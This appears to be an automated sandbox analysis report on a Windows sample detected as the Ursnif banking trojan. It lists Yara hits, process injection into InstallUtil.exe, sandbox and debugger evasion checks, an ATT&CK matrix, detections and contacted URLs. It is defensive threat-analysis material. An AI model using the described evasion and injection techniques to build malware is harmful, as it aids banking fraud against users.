                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Yara detected Ursnif
                  Source: Yara matchFile source: 0000000A.00000003.504942023.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501961576.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.502032730.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.535140555.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501571456.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501753987.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501977722.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501825234.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501701977.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501914236.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5584, type: MEMORYSTR
                  Source: Yara matchFile source: 10.2.InstallUtil.exe.1b694a0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.InstallUtil.exe.1340000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.InstallUtil.exe.1b694a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.535054926.0000000001B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                  E-Banking Fraud

                  barindex
                  Yara detected Ursnif
                  Source: Yara matchFile source: 0000000A.00000003.504942023.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501961576.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.502032730.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.535140555.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501571456.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501753987.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501977722.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501825234.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501701977.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501914236.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5584, type: MEMORYSTR
                  Source: Yara matchFile source: 10.2.InstallUtil.exe.1b694a0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.InstallUtil.exe.1340000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.InstallUtil.exe.1b694a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.535054926.0000000001B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                  System Summary

                  barindex
                  Writes or reads registry keys via WMI
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Writes registry values via WMI
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: OojqjHGE0W.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeCode function: String function: 00B38510 appears 105 times
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeCode function: String function: 00B381D0 appears 77 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_004015C0 NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,10_2_004015C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_0040188D GetProcAddress,NtCreateSection,memset,10_2_0040188D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_004013B7 NtMapViewOfSection,10_2_004013B7
                  Source: OojqjHGE0W.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: OojqjHGE0W.exeStatic PE information: invalid certificate
                  Source: OojqjHGE0W.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: OojqjHGE0W.exeReversingLabs: Detection: 46%
                  Source: OojqjHGE0W.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\OojqjHGE0W.exe "C:\Users\user\Desktop\OojqjHGE0W.exe"
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@3/0@2/1
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeCode function: 0_2_00B28340 StartServiceA,StrokePath,SetCurrentDirectoryA,CreateActCtxW,CloseHandle,GetTapeStatus,SetCurrentDirectoryA,0_2_00B28340
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: OojqjHGE0W.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: OojqjHGE0W.exeStatic file information: File size 1241656 > 1048576
                  Source: OojqjHGE0W.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x111a00
                  Source: OojqjHGE0W.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: OojqjHGE0W.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: OojqjHGE0W.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: OojqjHGE0W.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: OojqjHGE0W.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: OojqjHGE0W.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: OojqjHGE0W.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: OojqjHGE0W.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\Wotagebe poqu viquowe\Hosayem\Cajap\Viseti.pdb source: OojqjHGE0W.exe
                  Source: Binary string: C:\Wotagebe poqu viquowe\Hosayem\Cajap\Viseti.pdbP; source: OojqjHGE0W.exe, 00000000.00000000.267737292.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, OojqjHGE0W.exe, 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp
                  Source: Binary string: C:\Wotagebe poqu viquowe\Hosayem\Cajap\Viseti.pdbP;Q source: OojqjHGE0W.exe
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeCode function: 0_2_00B28AC2 push ebp; iretd 0_2_00B28AD6
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeCode function: 0_2_00B28A6D push es; iretd 0_2_00B28A86
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeCode function: 0_2_00B28B2A push ebp; iretd 0_2_00B28AD6
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeCode function: 0_2_00B3A3D0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00B3A3D0
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.57139474025
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeCode function: 0_2_00B28340 StartServiceA,StrokePath,SetCurrentDirectoryA,CreateActCtxW,CloseHandle,GetTapeStatus,SetCurrentDirectoryA,0_2_00B28340

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Yara detected Ursnif
                  Source: Yara matchFile source: 0000000A.00000003.504942023.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501961576.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.502032730.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.535140555.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501571456.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501753987.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501977722.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501825234.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501701977.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501914236.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5584, type: MEMORYSTR
                  Source: Yara matchFile source: 10.2.InstallUtil.exe.1b694a0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.InstallUtil.exe.1340000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.InstallUtil.exe.1b694a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.535054926.0000000001B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: OojqjHGE0W.exe, 00000000.00000002.477711873.00000000006FA000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ODBGHELP.DLLPSTOREC.DLLDIR_WATCH.DLLAPI_LOG.DLLCMDVRT64.DLLCMDVRT32.DLLSBIEDLL.DLLBGAGENT.DLLH
                  Found evasive API chain (may stop execution after checking system information)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleepgraph_10-477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664Thread sleep count: 48 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-8131
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeAPI coverage: 7.5 %
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeAPI call chain: ExitProcess graph end nodegraph_0-8132
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeAPI call chain: ExitProcess graph end nodegraph_10-470

                  Anti Debugging

                  barindex
                  Found API chain indicative of debugger detection
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_10-477
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeCode function: 0_2_00B3A1A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B3A1A0
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeCode function: 0_2_00B3A3D0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00B3A3D0
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeCode function: 0_2_00B3A1A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B3A1A0
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeCode function: 0_2_00B322D0 SetUnhandledExceptionFilter,0_2_00B322D0
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeCode function: 0_2_00B38260 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B38260

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: F21008Jump to behavior
                  Allocates memory in foreign processes
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page read and writeJump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\Desktop\OojqjHGE0W.exeCode function: 0_2_00B322F0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00B322F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_00401400 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,10_2_00401400

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Ursnif
                  Source: Yara matchFile source: 0000000A.00000003.504942023.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501961576.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.502032730.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.535140555.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501571456.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501753987.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501977722.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501825234.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501701977.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501914236.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5584, type: MEMORYSTR
                  Source: Yara matchFile source: 10.2.InstallUtil.exe.1b694a0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.InstallUtil.exe.1340000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.InstallUtil.exe.1b694a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.535054926.0000000001B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  barindex
                  Yara detected Ursnif
                  Source: Yara matchFile source: 0000000A.00000003.504942023.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501961576.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.502032730.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.535140555.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501571456.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501753987.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501977722.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501825234.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501701977.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.501914236.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5584, type: MEMORYSTR
                  Source: Yara matchFile source: 10.2.InstallUtil.exe.1b694a0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.InstallUtil.exe.1340000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.InstallUtil.exe.1b694a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.535054926.0000000001B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts2
                  Windows Management Instrumentation                  		1
                  Windows Service                  		1
                  Windows Service                  		12
                  Virtualization/Sandbox Evasion                  		OS Credential Dumping1
                  System Time Discovery                  		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
                  Ingress Tool Transfer                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts2
                  Service Execution                  		Boot or Logon Initialization Scripts311
                  Process Injection                  		311
                  Process Injection                  		LSASS Memory22
                  Security Software Discovery                  		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                  Non-Application Layer Protocol                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain Accounts12
                  Native API                  		Logon Script (Windows)Logon Script (Windows)1
                  Deobfuscate/Decode Files or Information                  		Security Account Manager12
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration12
                  Application Layer Protocol                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)3
                  Obfuscated Files or Information                  		NTDS1
                  Process Discovery                  		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script3
                  Software Packing                  		LSA Secrets1
                  Remote System Discovery                  		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials14
                  System Information Discovery                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  OojqjHGE0W.exe46%ReversingLabsWin32.Trojan.Jaik
                  OojqjHGE0W.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  10.2.InstallUtil.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
                  0.2.OojqjHGE0W.exe.8b5230.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                  10.0.InstallUtil.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
                  10.2.InstallUtil.exe.1340000.1.unpack100%AviraHEUR/AGEN.1245293Download File
                  10.0.InstallUtil.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
                  0.3.OojqjHGE0W.exe.2580000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
                  0.3.OojqjHGE0W.exe.8b5230.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                  0.3.OojqjHGE0W.exe.2580000.1.unpack100%AviraTR/Crypt.XPACK.Gen7Download File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
                  https://i.geistm.com/l/HFCH_DTS_LP?bcid=61c4707a19d27603f32a58ba&amp;bhid=6203eb0e7db0ad17f44b22d8&a0%Avira URL Cloudsafe
                  https://cdn.hoergeraete.hoeren-heute.ch/horizon_reveal/?act=ACT0000040013ACT&amp;utm_source=mcrs&amp0%Avira URL Cloudsafe
                  https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                  https://i.geistm.com/l/HFCH_DTS_LP?bcid=61c4707a19d27603f32a58b8&amp;bhid=62470ee6adad76040858398f&a0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  a-0003.fbs2-a-msedge.net
                  		13.107.40.203
                  		truefalse
                    		unknown
                    anm.msn.com
                    		unknown
                    		unknownfalse
                      		high
                      www.msn.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.msn.com/de-ch/false
                          		high
                          http://www.msn.com/false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.msn.com/de-ch/news/other/weniger-verbindungen-zwischen-z%c3%bcrich-und-bern-daf%c3%bcr-mInstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://www.msn.com/de-ch/news/other/fremdes-b%c3%bcsi-gef%c3%bcttert-frau-soll-1250-franken-strafe-InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://outlook.com/InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.msn.com/de-ch/shoppingInstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://ogp.me/ns#InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
